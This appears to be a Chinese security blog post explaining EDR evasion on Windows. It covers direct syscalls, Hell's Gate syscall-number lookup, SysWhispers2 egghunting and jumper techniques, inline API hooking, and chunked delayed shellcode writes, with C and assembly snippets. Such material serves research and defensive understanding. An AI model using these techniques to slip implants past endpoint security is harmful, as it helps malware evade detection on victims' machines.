

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Glacier">
  <meta name="keywords" content="">
  
    <meta name="description" content="规避“系统调用标记”规避常见的恶意API调用模式及使用直接系统调用并规避“系统调用标记”，来bypass edr">
<meta property="og:type" content="article">
<meta property="og:title" content="规避“系统调用标记”">
<meta property="og:url" content="https://glacierrrr.online/2022/11/12/%E8%A7%84%E9%81%BF%E2%80%9C%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E6%A0%87%E8%AE%B0%E2%80%9D/index.html">
<meta property="og:site_name" content="Glacier&#39;s Blog">
<meta property="og:description" content="规避“系统调用标记”规避常见的恶意API调用模式及使用直接系统调用并规避“系统调用标记”，来bypass edr">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/11/12/Nwn5hHyOCR8pEDe.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/12/PZxEp96fFIB8i2N.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/12/dfIEOSNrGlvC3Ko.png">
<meta property="article:published_time" content="2022-11-12T12:21:24.000Z">
<meta property="article:modified_time" content="2022-11-12T08:31:19.056Z">
<meta property="article:author" content="Glacier">
<meta property="article:tag" content="免杀">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s2.loli.net/2022/11/12/Nwn5hHyOCR8pEDe.png">
  
  
  
  <title>规避“系统调用标记” - Glacier&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"glacierrrr.online","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="规避“系统调用标记”"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-12 20:21" pubdate>
          2022年11月12日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          46 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">规避“系统调用标记”</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="规避“系统调用标记”"><a href="#规避“系统调用标记”" class="headerlink" title="规避“系统调用标记”"></a>规避“系统调用标记”</h1><p>规避常见的恶意API调用模式及使用直接系统调用并规避“系统调用标记”，来bypass edr</p>
<a id="more"></a>
<h2 id="直接使用系统调用"><a href="#直接使用系统调用" class="headerlink" title="直接使用系统调用"></a>直接使用系统调用</h2><p>在用户态运行的系统要控制系统时，或者要运行系统代码就必须取得R0权限。用户从R3到R0需要借助ntdll.dll中的函数，这些函数分别以“Nt”和“Zw”开头，这种函数叫做Native API，下图是调用过程：<br><img src="https://s2.loli.net/2022/11/12/Nwn5hHyOCR8pEDe.png" srcset="/img/loading.gif" lazyload><br>这些nt开头的函数一般没有官方文档，很多都是被逆向或者泄露windows源码的方式流出的。</p>
<p><code>FARPROC addr = GetProcAddress(LoadLibraryA(&quot;ntdll&quot;), &quot;NtCreateFile&quot;);</code><br>我们可以通过在内存中找到函数的首地址来调用这些nt开头的函数</p>
<p>在反编译syscall函数之后，可以得到一段非常具有特征的汇编指令</p>
<figure class="highlight arm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arm"><span class="hljs-keyword">mov</span>     <span class="hljs-built_in">r10</span>,rcx<br><span class="hljs-keyword">mov</span>     eax,xxh<br><span class="hljs-symbol">syscall</span><br></code></pre></td></tr></table></figure>
<p>用户调用windows api ReadFile，有些edr会hook ReadFile这个windows api，但实际上最终会调用到NTxxx这种函数。有些函数没有被edr hook就可以绕过。说白了还是通过黑名单机制的一种绕过。找到冷门的wdinwos api并找到对应的底层内核api</p>
<p>这里有个很好的网站<a target="_blank" rel="noopener" href="https://j00ru.vexillium.org/syscalls/nt/64/">sycall系统调用号文档</a><br>因为syscall在这里存储的是系统调用号</p>
<p>我们可以在visual studio中直接反编译查看汇编代码与字节码<br>工具-&gt;选项-&gt;启用地址级调试<br>在调试过程中，Debug-&gt;window-&gt;disassembly</p>
<h2 id="动态进行syscall"><a href="#动态进行syscall" class="headerlink" title="动态进行syscall"></a>动态进行syscall</h2><p>我们很多时候使用syscall不是直接调用，不会在代码里硬编码syscall的系统调用号。因为不同的系统调用号是不同的，所以我们需要进行动态syscall<br>这里我们可以直接使用Hell’s Gate来遍历NtDLL的导出表，根据函数名hash，找到函数的地址。接着使用0xb8获取到系统调用号，之后通过syscall来执行一系列函数<br>通过TEB获取到dll的地址可以参考：<a target="_blank" rel="noopener" href="https://silver-glacier.github.io/2022/11/12/%E8%8E%B7%E5%8F%96DLL%E5%9F%BA%E5%9D%80/">前置知识</a></p>
<p>接下来我们的步骤是</p>
<ol>
<li>解析pe结构，获取导出表</li>
<li>遍历hash表和导出表，找到syscall的函数，通过标记的方式获得系统调用号</li>
<li>调用syscall，分配内存，修改内存属性，创建线程</li>
</ol>
<p>这些在Hell’s Hate已经实现，我们重点来看一下这段代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (*((PBYTE)pFunctionAddress + cw) == <span class="hljs-number">0x4c</span><br>          &amp;&amp; *((PBYTE)pFunctionAddress + <span class="hljs-number">1</span> + cw) == <span class="hljs-number">0x8b</span><br>          &amp;&amp; *((PBYTE)pFunctionAddress + <span class="hljs-number">2</span> + cw) == <span class="hljs-number">0xd1</span><br>          &amp;&amp; *((PBYTE)pFunctionAddress + <span class="hljs-number">3</span> + cw) == <span class="hljs-number">0xb8</span><br>          &amp;&amp; *((PBYTE)pFunctionAddress + <span class="hljs-number">6</span> + cw) == <span class="hljs-number">0x00</span><br>          &amp;&amp; *((PBYTE)pFunctionAddress + <span class="hljs-number">7</span> + cw) == <span class="hljs-number">0x00</span>) &#123;<br>          BYTE high = *((PBYTE)pFunctionAddress + <span class="hljs-number">5</span> + cw);<br>          BYTE low = *((PBYTE)pFunctionAddress + <span class="hljs-number">4</span> + cw);<br>          pVxTableEntry-&gt;wSystemCall = (high &lt;&lt; <span class="hljs-number">8</span>) | low;<br>          <span class="hljs-keyword">break</span>;<br>  &#125;<br></code></pre></td></tr></table></figure>
<p>为什么匹配这几个字节就能找到syscall调用号<br>这里有张图很明确<br><img src="https://s2.loli.net/2022/11/12/PZxEp96fFIB8i2N.png" srcset="/img/loading.gif" lazyload><br>可以看到syscall的汇编语句比较固定</p>
<figure class="highlight arm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arm"><span class="hljs-number">4</span>C8BD1 -&gt; <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r10</span>, rcx<br><span class="hljs-symbol">B8XXXXXXXX</span> -&gt; move eax,xx<br><span class="hljs-number">0</span>f05 -&gt; syscall<br></code></pre></td></tr></table></figure>
<p>而我们逐个字节进行遍历，直到出现mov r10, rcx和move eax，经过位运算得到syscall调用号<br>这是我们生成的syscall</p>
<figure class="highlight arm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs arm"><span class="hljs-comment">; Hell&#x27;s Gate</span><br>  <span class="hljs-comment">; Dynamic system call invocation </span><br>  <span class="hljs-comment">; </span><br>  <span class="hljs-comment">; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)</span><br><br>  <span class="hljs-meta">.data</span><br>      wSystemCall DWORD <span class="hljs-number">000</span>h<br><br>  <span class="hljs-meta">.code</span> <br>      HellsGate <span class="hljs-meta">PROC</span><br>          <span class="hljs-keyword">mov</span> wSystemCall, <span class="hljs-number">000</span>h<br>          <span class="hljs-keyword">mov</span> wSystemCall, ecx<br>          ret<br>      HellsGate <span class="hljs-meta">ENDP</span><br><br>      HellDescent <span class="hljs-meta">PROC</span><br>          <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r10</span>, rcx<br>          <span class="hljs-keyword">mov</span> eax, wSystemCall<br><br>          syscall<br>          ret<br>      HellDescent <span class="hljs-meta">ENDP</span><br>  <span class="hljs-meta">end</span><br></code></pre></td></tr></table></figure>
<h2 id="SysWhispers2"><a href="#SysWhispers2" class="headerlink" title="SysWhispers2"></a>SysWhispers2</h2><p><a target="_blank" rel="noopener" href="https://github.com/jthuraisamy/SysWhispers2">SysWhispers2</a> 是一个合集，用python生成.c源码文件。这些文件的作用和Hell’s Gate类似，也是在PE中找导出表，之后通过对比函数hash找到syscall调用号。相对Hell’s Gate有更多的函数可供选择，不仅仅是内存相关的几个函数。并且对syscall的asm有一定程度的混淆(使用了INT 2EH替换sycall)</p>
<p>我们在动态使用syscall的时候已经发现了，syscall反编译之后的汇编语句比较固定，那这么这样的话syscall特征非常明显,静态特征就很容易被识别到<br>对于这个问题，SysWhispers2做出了相应的解决办法</p>
<blockquote>
<p>egghunter<br>在fuzzysecurity的<a target="_blank" rel="noopener" href="https://www.fuzzysecurity.com/tutorials/expDev/4.html">二进制教程</a>中提到过相关技术<br>先用彩蛋（一些随机的、唯一的、可识别的模式）替换syscall指令，然后在运行时，再在内存中搜索这个彩蛋，并使用ReadProcessMemory和WriteProcessMemory等WINAPI调用将其替换为syscall指令。之后，我们可以正常使用直接系统调用了<br>我们在内存中使用db表示一个字节，比如我们在内存中.txt段写入”w00tw00t”的字节</p>
</blockquote>
<figure class="highlight arm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs arm"><span class="hljs-symbol">NtAllocateVirtualMemory</span> <span class="hljs-meta">PROC</span><br>  <span class="hljs-keyword">mov</span> [rsp +<span class="hljs-number">8</span>], rcx          <span class="hljs-comment">; Save registers.</span><br>  <span class="hljs-keyword">mov</span> [rsp+<span class="hljs-number">16</span>], rdx<br>  <span class="hljs-keyword">mov</span> [rsp+<span class="hljs-number">24</span>], <span class="hljs-built_in">r8</span><br>  <span class="hljs-keyword">mov</span> [rsp+<span class="hljs-number">32</span>], <span class="hljs-built_in">r9</span><br>  <span class="hljs-keyword">sub</span> rsp, <span class="hljs-number">28</span>h<br>  <span class="hljs-keyword">mov</span> ecx, <span class="hljs-number">003970</span>B07h        <span class="hljs-comment">; Load function hash into ECX.</span><br>  call SW2_GetSyscallNumber  <span class="hljs-comment">; Resolve function hash into syscall number.</span><br>  <span class="hljs-keyword">add</span> rsp, <span class="hljs-number">28</span>h<br>  <span class="hljs-keyword">mov</span> rcx, [rsp +<span class="hljs-number">8</span>]          <span class="hljs-comment">; Restore registers.</span><br>  <span class="hljs-keyword">mov</span> rdx, [rsp+<span class="hljs-number">16</span>]<br>  <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r8</span>, [rsp+<span class="hljs-number">24</span>]<br>  <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r9</span>, [rsp+<span class="hljs-number">32</span>]<br>  <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r10</span>, rcx<br>  DB <span class="hljs-number">77</span>h                     <span class="hljs-comment">; &quot;w&quot;</span><br>  DB <span class="hljs-number">0</span>h                      <span class="hljs-comment">; &quot;0&quot;</span><br>  DB <span class="hljs-number">0</span>h                      <span class="hljs-comment">; &quot;0&quot;</span><br>  DB <span class="hljs-number">74</span>h                     <span class="hljs-comment">; &quot;t&quot;</span><br>  DB <span class="hljs-number">77</span>h                     <span class="hljs-comment">; &quot;w&quot;</span><br>  DB <span class="hljs-number">0</span>h                      <span class="hljs-comment">; &quot;0&quot;</span><br>  DB <span class="hljs-number">0</span>h                      <span class="hljs-comment">; &quot;0&quot;</span><br>  DB <span class="hljs-number">74</span>h                     <span class="hljs-comment">; &quot;t&quot;</span><br>  ret<br><span class="hljs-symbol">NtAllocateVirtualMemory</span> <span class="hljs-meta">ENDP</span><br></code></pre></td></tr></table></figure>
<p>接下来遍历全文，去寻找我们埋下的彩蛋</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">FindAndReplace</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> egg[], <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> replace[])</span></span><br><span class="hljs-function"></span>&#123;<br><br>    ULONG64 startAddress = <span class="hljs-number">0</span>;<br>    ULONG64 size = <span class="hljs-number">0</span>;<br><br>    GetMainModuleInformation(&amp;startAddress, &amp;size);<br><br>    <span class="hljs-keyword">if</span> (size &lt;= <span class="hljs-number">0</span>) &#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] Error detecting main module size&quot;</span>);<br>        <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>    &#125;<br><br>    ULONG64 currentOffset = <span class="hljs-number">0</span>;<br><br>    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span>* current = (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span>*)<span class="hljs-built_in">malloc</span>(<span class="hljs-number">8</span>*<span class="hljs-keyword">sizeof</span>(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span>*));<br>    <span class="hljs-keyword">size_t</span> nBytesRead;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Starting search from: 0x%llu\n&quot;</span>, (ULONG64)startAddress + currentOffset);<br><br>    <span class="hljs-keyword">while</span> (currentOffset &lt; size - <span class="hljs-number">8</span>)<br>    &#123;<br>        currentOffset++;<br>        LPVOID currentAddress = (LPVOID)(startAddress + currentOffset);<br>        <span class="hljs-keyword">if</span>(DEBUG &gt; <span class="hljs-number">0</span>)&#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Searching at 0x%llu\n&quot;</span>, (ULONG64)currentAddress);<br>        &#125;<br>        <span class="hljs-keyword">if</span> (!ReadProcessMemory((HANDLE)((<span class="hljs-keyword">int</span>)<span class="hljs-number">-1</span>), currentAddress, current, <span class="hljs-number">8</span>, &amp;nBytesRead)) &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] Error reading from memory\n&quot;</span>);<br>            <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>        &#125;<br>        <span class="hljs-keyword">if</span> (nBytesRead != <span class="hljs-number">8</span>) &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[-] Error reading from memory\n&quot;</span>);<br>            <span class="hljs-keyword">continue</span>;<br>        &#125;<br><br>        <span class="hljs-keyword">if</span>(DEBUG &gt; <span class="hljs-number">0</span>)&#123;<br>            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; nBytesRead; i++)&#123;<br>                <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%02x &quot;</span>, current[i]);<br>            &#125;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\n&quot;</span>);<br>        &#125;<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">memcmp</span>(egg, current, <span class="hljs-number">8</span>) == <span class="hljs-number">0</span>)<br>        &#123;<br>            <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Found at %llu\n&quot;</span>, (ULONG64)currentAddress);<br>            WriteProcessMemory((HANDLE)((<span class="hljs-keyword">int</span>)<span class="hljs-number">-1</span>), currentAddress, replace, <span class="hljs-number">8</span>, &amp;nBytesRead);<br>        &#125;<br><br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Ended search at:   0x%llu\n&quot;</span>, (ULONG64)startAddress + currentOffset);<br>    <span class="hljs-built_in">free</span>(current);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>这样做虽然可以绕过静态的检测了但依旧存在问题，理论上syscall行为应该只存在ntdll中，而我们使用syscall是在当前程序中。简单的判断RIP就可以检测出我们的可疑行为<br><img src="https://s2.loli.net/2022/11/12/dfIEOSNrGlvC3Ko.png" srcset="/img/loading.gif" lazyload><br>而对与RIP的检测，作者也给出了技术方案，还是比较简单的。在内存中搜索syscall的地址，直接jmp到该位置。即可让RIP指向ntdll<br><code>python3 syswhispers.py -p common -a x64 -c msvc -m jumper -v -d -o 1</code></p>
<h2 id="机器学习特征的edr的检测"><a href="#机器学习特征的edr的检测" class="headerlink" title="机器学习特征的edr的检测"></a>机器学习特征的edr的检测</h2><p><a target="_blank" rel="noopener" href="https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection"></a></p>
<h3 id="windows-api-hook"><a href="#windows-api-hook" class="headerlink" title="windows api hook"></a>windows api hook</h3><ol>
<li>找到内存中需要被hook的函数地址<code>LPVOID  lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);</code></li>
<li>找到后将前七个字节改为跳转，如下<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> jmpSc[<span class="hljs-number">7</span>]&#123;<br>        <span class="hljs-number">0xB8</span>, b[<span class="hljs-number">0</span>], b[<span class="hljs-number">1</span>], b[<span class="hljs-number">2</span>], b[<span class="hljs-number">3</span>],<br>        <span class="hljs-number">0xFF</span>, <span class="hljs-number">0xE0</span><br>    &#125;;<br>``` <br><span class="hljs-number">3.</span> 机器码对应的汇编指令大概是<br>```arm<br>move eax,xxxx<br>jmp eax<br></code></pre></td></tr></table></figure></li>
<li>修改内存<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c">WriteProcessMemory(<br>        hProc,<br>        lpDllExport,<br>        jmpSc,<br>        <span class="hljs-keyword">sizeof</span>(jmpSc),<br>        &amp;szWritten<br>    );<br></code></pre></td></tr></table></figure>
实现了劫持对应函执行流程的功能。如果想要维持函数原本的功能，保存原本的七个字节，在shellcode中再次替换这部分内存并jump回来</li>
</ol>
<h3 id="Windows-内存分配的一些规则"><a href="#Windows-内存分配的一些规则" class="headerlink" title="Windows 内存分配的一些规则"></a>Windows 内存分配的一些规则</h3><p>在windows 10 64位下，内存最小的分配粒度为4kB, systeminfo结构体中，标识了这个变量，为内存分页的大小。<br>在windows中，所有VirtualAllocEx分配的内存，会向上取整到AllocationGranularity的值，windows10下为64kb，比如：</p>
<p>我们在0x40000000的基址分配了4kB的MEM_COMMIT | MEM_RESERVE的内存，那么整块0x40010000 (64kB)区域将不能被重新分配。</p>
<h3 id="实现原理"><a href="#实现原理" class="headerlink" title="实现原理"></a>实现原理</h3><p>很多edr将创建远程线程的行为列为可疑行为，比如windows definder仅仅是做记录但并不报警，产生报警还有其他的判断逻辑</p>
<ol>
<li>与其分配一大块内存并直接将~250KB的implant shellcode写入该内存，不如分配小块但连续的内存，例如&lt;64KB的内存，并将其标记为NO_ACCESS。然后，将shellcode按照相应的块大小写入这些内存页中。</li>
<li>在上述的每一个操作之间引入延迟。这将增加执行shellcode所需的时间，但也会淡化连续执行模式。</li>
<li>使用钩子，劫持RtlpWow64CtxFromAmd64函数，执行恶意shellcode</li>
</ol>
<hr>
<p>参考文章<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11496"></a><br><a target="_blank" rel="noopener" href="https://klezvirus.github.io/RedTeaming/AV_Evasion/NoSysWhisper/"></a><br><a target="_blank" rel="noopener" href="https://blog.redbluepurple.io/windows-security-research/bypassing-injection-detection"></a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%85%8D%E6%9D%80/" class="category-chain-item">免杀</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%85%8D%E6%9D%80/">#免杀</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>规避“系统调用标记”</div>
      <div>https://glacierrrr.online/2022/11/12/规避“系统调用标记”/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Glacier</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年11月12日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/12/%E8%8E%B7%E5%8F%96DLL%E5%9F%BA%E5%9D%80/" title="获取DLL基址">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">获取DLL基址</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/09/Halo&#39;s%20Gate/" title="Halo&#39;s Gate">
                        <span class="hidden-mobile">Halo&#39;s Gate</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

